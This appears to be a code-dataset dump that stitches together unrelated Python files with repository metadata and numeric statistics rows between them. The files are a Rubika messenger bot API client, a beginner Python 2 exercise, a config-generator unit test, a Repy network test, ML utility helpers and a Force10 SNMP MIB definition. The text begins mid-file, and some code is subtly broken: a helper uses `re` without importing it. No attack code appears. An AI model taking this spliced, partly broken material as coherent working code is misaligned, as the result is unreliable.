"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def pin(self, chat_id, message_id):
return post(json={"api_version": "4", "auth": self.auth, "client": {
"app_name": "Main",
"app_version": "2.9.5",
"lang_code": "fa",
"package": "ir.resaneh1.iptv",
"platform": "Android"
},
"data_enc": self.enc.encrypt(dumps({
"action":"Pin",
"message_id": message_id,
"object_guid": chat_id
})),
"method": "setPinMessage"
},url=Bot._getURL())
def unpin(self, chat_id, message_id):
return post(json={"api_version": "4", "auth": self.auth, "client": {
"app_name": "Main",
"app_version": "2.9.5",
"lang_code": "fa",
"package": "ir.resaneh1.iptv",
"platform": "Android"
},
"data_enc": self.enc.encrypt(dumps({
"action":"Unpin",
"message_id": message_id,
"object_guid": chat_id
})),
"method": "setPinMessage"
},url=Bot._getURL())
def joinGroup(self, link):
hashLink = link.split("/")[-1]
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"joinGroup",
"input":{
"hash_link": hashLink
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def leaveGroup(self, chat_id):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"leaveGroup",
"input":{
"group_guid": chat_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def block(self, chat_id):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"setBlockUser",
"input":{
"action": "Block",
"user_guid": chat_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def unblock(self, chat_id):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"setBlockUser",
"input":{
"action": "Unblock",
"user_guid": chat_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def sendPhoto(self, chat_id, file, size, thumbnail=None, caption=None, message_id=None):
uresponse = Bot._uploadFile(self, file)
file_inline = {
"dc_id": uresponse[0]["dc_id"],
"file_id": uresponse[0]["id"],
"type":"Image",
"file_name": file.split("/")[-1],
"size": str(Path(file).stat().st_size),
"mime": file.split(".")[-1],
"access_hash_rec": uresponse[1],
"width": size[0],
"height": size[1],
"thumb_inline": thumbnail or "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"
}
inData = {
"method":"sendMessage",
"input":{
"file_inline": file_inline,
"object_guid": chat_id,
"rnd": f"{randint(100000,999999999)}",
"reply_to_message_id": message_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}
if caption != None: inData["input"]["text"] = caption
data = {"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps(inData))}
return post(json=data,url=Bot._getURL())
def sendVoice(self, chat_id, file, time, caption=None, message_id=None):
# file's format should be ogg. time should be ms (type: float).
uresponse = Bot._uploadFile(self, file)
inData = {
"method":"sendMessage",
"input":{
"file_inline": {
"dc_id": uresponse[0]["dc_id"],
"file_id": uresponse[0]["id"],
"type":"Voice",
"file_name": file.split("/")[-1],
"size": str(Path(file).stat().st_size),
"time": time,
"mime": file.split(".")[-1],
"access_hash_rec": uresponse[1],
},
"object_guid":chat_id,
"rnd":f"{randint(100000,999999999)}",
"reply_to_message_id":message_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}
if caption != None: inData["input"]["text"] = caption
data = {
"api_version":"5",
"auth":self.auth,
"data_enc":self.enc.encrypt(dumps(inData))
}
return post(json=data,url=Bot._getURL())
def sendDocument(self, chat_id, file, caption=None, message_id=None):
# Bot.sendDocument("guid","./file.txt", caption="anything", message_id="12345678")
uresponse = Bot._uploadFile(self, file)
file_id = str(uresponse[0]["id"])
mime = file.split(".")[-1]
dc_id = uresponse[0]["dc_id"]
access_hash_rec = uresponse[1]
file_name = file.split("/")[-1]
size = str(Path(file).stat().st_size)
inData = {
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"reply_to_message_id":message_id,
"rnd":f"{randint(100000,999999999)}",
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}
if caption != None: inData["input"]["text"] = caption
data = {
"api_version":"5",
"auth":self.auth,
"data_enc":self.enc.encrypt(dumps(inData))
}
while True:
try:
return loads(self.enc.decrypt(loads(post(json=data,url=Bot._getURL()).text)['data_enc']))
break
except: continue
def sendLocation(self, chat_id, location, message_id=None):
# location = [float(x), float(y)]
return post(json={
"api_version":"4",
"auth":self.auth,
"client":{
"app_name":"Main",
"app_version":"2.8.1",
"platform":"Android",
"package":"ir.resaneh1.iptv",
"lang_code":"fa"
},
"data_enc":self.enc.encrypt(dumps({
"is_mute": False,
"object_guid":chat_id,
"rnd":f"{randint(100000,999999999)}",
"location":{
"latitude": location[0],
"longitude": location[1]
},
"reply_to_message_id":message_id
})),
"method":"sendMessage"
},url=Bot._getURL())
def searchInChannelMembers(self, text, channel_guid):
try:
return loads(self.enc.decrypt(post(json={
"api_version":"4",
"auth":self.auth,
"client":{
"app_name":"Main",
"app_version":"2.8.1",
"platform":"Android",
"package":"ir.resaneh1.iptv",
"lang_code":"fa"
},
"data_enc":self.enc.encrypt(dumps({
"channel_guid": channel_guid,
"search_text": text
})),
"method":"getChannelAllMembers"
},url=Bot._getURL()).json()["data_enc"]))["in_chat_members"]
except KeyError: return None
def getChatsUpdate(self):
time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200)
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getChatsUpdates",
"input":{
"state":time_stamp,
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("chats")
def getChatUpdate(self, chat_id):
time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200)
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesUpdates",
"input":{
"object_guid":chat_id,
"state":time_stamp
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("updated_messages")
def myStickerSet(self):
time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200)
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMyStickerSets",
"input":{},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json().get("data_enc"))).get("data")
class Socket:
data = {"error":[],"messages":[]}
def __init__(self, auth):
self.auth = auth
self.enc = rubika.encryption.encryption(auth)
def on_open(self, ws):
def handShake(*args):
ws.send(dumps({
"api_version": "4",
"auth": self.auth,
"data_enc": "",
"method": "handShake"
}))
import _thread
_thread.start_new_thread(handShake, ())
def on_error(self, ws, error):
Socket.data["error"].append(error)
def on_message(self, ws, message):
try:
parsedMessage = loads(message)
Socket.data["messages"].append({"type": parsedMessage["type"], "data": loads(self.enc.decrypt(parsedMessage["data_enc"]))})
except KeyError: pass
def on_close(self, ws, code, msg):
return {"code": code, "message": msg}
def handle(self, OnOpen=None, OnError=None, OnMessage=None, OnClose=None, forEver=True):
import websocket
ws = websocket.WebSocketApp(
"wss://jsocket3.iranlms.ir:80",
on_open=OnOpen or Socket(self.auth).on_open,
on_message=OnMessage or Socket(self.auth).on_message,
on_error=OnError or Socket(self.auth).on_error,
on_close=OnClose or Socket(self.auth).on_close
)
if forEver : ws.run_forever() | 29.349225 | 2,034 | 0.634665 | 2,970 | 24,624 | 5.091582 | 0.123906 | 0.022219 | 0.032535 | 0.034255 | 0.601971 | 0.571816 | 0.53895 | 0.535181 | 0.524732 | 0.507406 | 0 | 0.03091 | 0.163093 | 24,624 | 839 | 2,035 | 29.349225 | 0.702882 | 0.016244 | 0 | 0.613666 | 0 | 0.001314 | 0.368978 | 0.093771 | 0 | 1 | 0 | 0 | 0 | 1 | 0.061761 | false | 0.001314 | 0.009198 | 0.036794 | 0.128778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
051f4dab5a5f1bed25333ea9cb6d58c8c48a834b | 424 | py | Python | lpyHardway/logic/ex2.py | oreanroy/learn_modules | fb1debc612940b65c409d8f5b35a3b4e16e67494 | [
"MIT"
] | null | null | null | lpyHardway/logic/ex2.py | oreanroy/learn_modules | fb1debc612940b65c409d8f5b35a3b4e16e67494 | [
"MIT"
] | 17 | 2019-12-01T16:56:29.000Z | 2022-03-02T04:49:51.000Z | lpyHardway/logic/ex2.py | oreanroy/learn_modules | fb1debc612940b65c409d8f5b35a3b4e16e67494 | [
"MIT"
] | 1 | 2019-09-28T00:43:54.000Z | 2019-09-28T00:43:54.000Z | people = 30
cars = 40
buses = 15
if cars > people:
print "We should take the cars."
elif cars < people:
print "we should not take the cars."
else:
print "we can't decide."
if buses > cars:
print " That's too many buses"
elif buses < cars:
print " Maybe we could take the bus."
else:
print "we stil can't decide."
if people > buses:
print " Alright lets take the buses."
else:
print "Fine, let's stay home then."
| 17.666667 | 38 | 0.676887 | 74 | 424 | 3.878378 | 0.445946 | 0.097561 | 0.10453 | 0.118467 | 0.160279 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018127 | 0.21934 | 424 | 23 | 39 | 18.434783 | 0.848943 | 0 | 0 | 0.157895 | 0 | 0 | 0.463357 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.421053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
05260b29fa65b53dc965a1c89ebcef95a1a96d54 | 396 | py | Python | test/config_generator_test.py | jnohlgard/projector-installer | 52aeaa936aa21d9fa6aee109d78e209fa068821b | [
"Apache-2.0"
] | null | null | null | test/config_generator_test.py | jnohlgard/projector-installer | 52aeaa936aa21d9fa6aee109d78e209fa068821b | [
"Apache-2.0"
] | null | null | null | test/config_generator_test.py | jnohlgard/projector-installer | 52aeaa936aa21d9fa6aee109d78e209fa068821b | [
"Apache-2.0"
] | null | null | null | """Test config_generator.py module"""
from unittest import TestCase
from projector_installer.config_generator import token_quote
class ConfigGeneratorTest(TestCase):
"""Test config_generator.py module"""
def test_token_quote(self) -> None:
"""The token_quote method must return the same token in quotes"""
self.assertEqual(token_quote('some_token'), '\"some_token\"')
| 30.461538 | 73 | 0.739899 | 50 | 396 | 5.64 | 0.54 | 0.141844 | 0.134752 | 0.148936 | 0.191489 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 396 | 12 | 74 | 33 | 0.839286 | 0.310606 | 0 | 0 | 0 | 0 | 0.093385 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
053268be449fba403f273951c902bae23a8253b1 | 333 | py | Python | tests/ut_repytests_loose-testnetmessportreuse.py | SeattleTestbed/repy_v1 | f40a02e2e398b1ec67fede84b41a264ae7356d2c | [
"MIT"
] | 1 | 2021-08-18T05:58:17.000Z | 2021-08-18T05:58:17.000Z | tests/ut_repytests_loose-testnetmessportreuse.py | SeattleTestbed/repy_v1 | f40a02e2e398b1ec67fede84b41a264ae7356d2c | [
"MIT"
] | 3 | 2015-11-17T21:01:03.000Z | 2016-07-14T09:08:04.000Z | tests/ut_repytests_loose-testnetmessportreuse.py | SeattleTestbed/repy_v1 | f40a02e2e398b1ec67fede84b41a264ae7356d2c | [
"MIT"
] | 5 | 2015-07-02T13:29:23.000Z | 2021-09-25T07:48:30.000Z | #pragma out
#pragma repy restrictions.loose
def foo(ip,port,mess, ch):
print ip,port,mess,ch
stopcomm(ch)
def noop(a,b,c,d):
pass
if callfunc == 'initialize':
ip = getmyip()
noopch = recvmess(ip,<messport>,noop)
recvmess(ip,<messport1>,foo)
sleep(.1)
sendmess(ip,<messport1>,'hi',ip,<messport>)
stopcomm(noopch)
| 18.5 | 45 | 0.678679 | 50 | 333 | 4.52 | 0.62 | 0.053097 | 0.088496 | 0.106195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010563 | 0.147147 | 333 | 17 | 46 | 19.588235 | 0.785211 | 0.12012 | 0 | 0 | 0 | 0 | 0.041237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.083333 | 0 | null | null | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
055c91bef8da3c2b5ab9913ec9ae41927e8fef83 | 1,514 | py | Python | evkit/utils/misc.py | joel99/midlevel-reps | f0b4a4d8ccf09a0488cd18af24723172aff99446 | [
"MIT"
] | 120 | 2019-04-22T04:45:28.000Z | 2022-03-23T01:53:17.000Z | evkit/utils/misc.py | joel99/midlevel-reps | f0b4a4d8ccf09a0488cd18af24723172aff99446 | [
"MIT"
] | 14 | 2019-06-12T08:21:21.000Z | 2021-08-25T15:36:58.000Z | evkit/utils/misc.py | joel99/midlevel-reps | f0b4a4d8ccf09a0488cd18af24723172aff99446 | [
"MIT"
] | 19 | 2019-06-19T07:00:36.000Z | 2022-03-24T07:18:30.000Z | import collections
import torch
import pprint
import string
remove_whitespace = str.maketrans('', '', string.whitespace)
def cfg_to_md(cfg, uuid):
''' Because tensorboard uses markdown'''
return uuid + "\n\n " + pprint.pformat((cfg)).replace("\n", " \n").replace("\n \'", "\n \'") + ""
def is_interactive():
try:
ip = get_ipython()
return ip.has_trait('kernel')
except:
return False
def is_cuda(model):
return next(model.parameters()).is_cuda
class Bunch(object):
def __init__(self, adict):
self.__dict__.update(adict)
self._keys, self._vals = zip(*adict.items())
self._keys, self._vals = list(self._keys), list(self._vals)
def keys(self):
return self._keys
def vals(self):
return self._vals
def compute_weight_norm(parameters):
''' no grads! '''
total = 0.0
count = 0
for p in parameters:
total += torch.sum(p.data**2)
# total += p.numel()
count += p.numel()
return (total / count)
def get_number(name):
"""
use regex to get the first integer in the name
if none exists, return -1
"""
try:
num = int(re.findall("[0-9]+", name)[0])
except:
num = -1
return num
def update_dict_deepcopy(d, u): # we need a deep dictionary update
for k, v in u.items():
if isinstance(v, collections.Mapping):
d[k] = update_dict_deepcopy(d.get(k, {}), v)
else:
d[k] = v
return d
| 22.939394 | 110 | 0.579921 | 204 | 1,514 | 4.151961 | 0.460784 | 0.03778 | 0.021251 | 0.03778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008212 | 0.27609 | 1,514 | 65 | 111 | 23.292308 | 0.764599 | 0.112285 | 0 | 0.090909 | 0 | 0 | 0.031298 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.204545 | false | 0 | 0.090909 | 0.068182 | 0.522727 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0565ccb5f3f8b36de113f3a2bcbbc32675fef341 | 58,839 | py | Python | pysnmp-with-texts/FORCE10-MONITORING-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/FORCE10-MONITORING-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/FORCE10-MONITORING-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module FORCE10-MONITORING-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/FORCE10-MONITORING-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:14:24 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
f10Mgmt, = mibBuilder.importSymbols("FORCE10-SMI", "f10Mgmt")
F10VlanID, F10CycloneVersion, F10ProcessorModuleType, F10PortPipeID, F10QueueID, F10SlotID = mibBuilder.importSymbols("FORCE10-TC", "F10VlanID", "F10CycloneVersion", "F10ProcessorModuleType", "F10PortPipeID", "F10QueueID", "F10SlotID")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
ObjectGroup, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "ModuleCompliance", "NotificationGroup")
Gauge32, Counter32, Integer32, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Bits, IpAddress, TimeTicks, Unsigned32, MibIdentifier, ObjectIdentity, NotificationType, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "Counter32", "Integer32", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Bits", "IpAddress", "TimeTicks", "Unsigned32", "MibIdentifier", "ObjectIdentity", "NotificationType", "Counter64")
DisplayString, TextualConvention, MacAddress, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "MacAddress", "TruthValue")
f10MonitoringMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 6027, 3, 3))
f10MonitoringMib.setRevisions(('2008-12-18 12:00', '1906-01-20 00:00', '2000-11-02 10:30',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: f10MonitoringMib.setRevisionsDescriptions(('Force10 Monitoring MIB version 1.3 Added CPU Ingress Queue Unicast Statistics table. ', 'Force10 Monitoring MIB version 1.2 Added IP and ARP statistic objects that are not available in RFC1213. ', 'Force10 Monitoring MIB version 1.1',))
if mibBuilder.loadTexts: f10MonitoringMib.setLastUpdated('200812181200Z')
if mibBuilder.loadTexts: f10MonitoringMib.setOrganization('Force10 Networks, Inc.')
if mibBuilder.loadTexts: f10MonitoringMib.setContactInfo('Force10 Networks, Inc 1440 McCarthy Blvd Milpitas, CA 95035 (408) 571-3500 support@force10networks.com http://www.force10networks.com')
if mibBuilder.loadTexts: f10MonitoringMib.setDescription('Force10 Monitoring MIB provides statistics and accounting for various Force10 products. ')
f10MonGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 1))
f10MonQueue = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2))
f10MonMac = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3))
f10MonIfQueue = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4))
f10NetworkStat = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5))
f10IpStatistic = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1))
f10ArpStatistic = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2))
f10MonMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("version1", 1), ("version1dot1", 2), ("version1dot2", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MonMibVersion.setStatus('current')
if mibBuilder.loadTexts: f10MonMibVersion.setDescription(' version1(1) - initial version, define QOS Queue Statistics table. version1dot1(2) - support MAC Accounting (f10MonMac). version1dot2(3) - support Interface Queue Statistics Tables (f10MonIfQueue). ')
f10MonQueueGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 1))
f10MonMaxQueue = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MonMaxQueue.setStatus('current')
if mibBuilder.loadTexts: f10MonMaxQueue.setDescription('The maximum number of Force10 QOS queue supported by Force10 Interfaces. ')
f10InQueueStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2), )
if mibBuilder.loadTexts: f10InQueueStatisticsTable.setStatus('current')
if mibBuilder.loadTexts: f10InQueueStatisticsTable.setDescription('The Force10 QOS Input Queue Statistics Table. This table provides Input Queue statistics for Force10 Interfaces. ')
f10InQueueStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10InQueueId"))
if mibBuilder.loadTexts: f10InQueueStatisticsEntry.setStatus('current')
if mibBuilder.loadTexts: f10InQueueStatisticsEntry.setDescription('An entry in the Force10 QOS Input Queue table. The Input Queue Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the Queue ID should be a valid Force10 Queue ID. ')
f10InQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 1), F10QueueID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueId.setStatus('current')
if mibBuilder.loadTexts: f10InQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. ')
f10InQueueDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueDropPackets.setStatus('current')
if mibBuilder.loadTexts: f10InQueueDropPackets.setDescription(' ')
f10InQueueBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueBytes.setStatus('current')
if mibBuilder.loadTexts: f10InQueueBytes.setDescription(' ')
f10InQueueMatchPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueMatchPackets.setStatus('current')
if mibBuilder.loadTexts: f10InQueueMatchPackets.setDescription(' ')
f10InQueueMatchBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueMatchBytes.setStatus('current')
if mibBuilder.loadTexts: f10InQueueMatchBytes.setDescription(' ')
f10InQueueMatchBps = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueMatchBps.setStatus('current')
if mibBuilder.loadTexts: f10InQueueMatchBps.setDescription(' ')
f10InQueueCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 7), F10CycloneVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueCycloneVersion.setStatus('current')
if mibBuilder.loadTexts: f10InQueueCycloneVersion.setDescription('The linecard Cyclone hardware version. ')
f10InQueueBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueueBytesCount.setStatus('current')
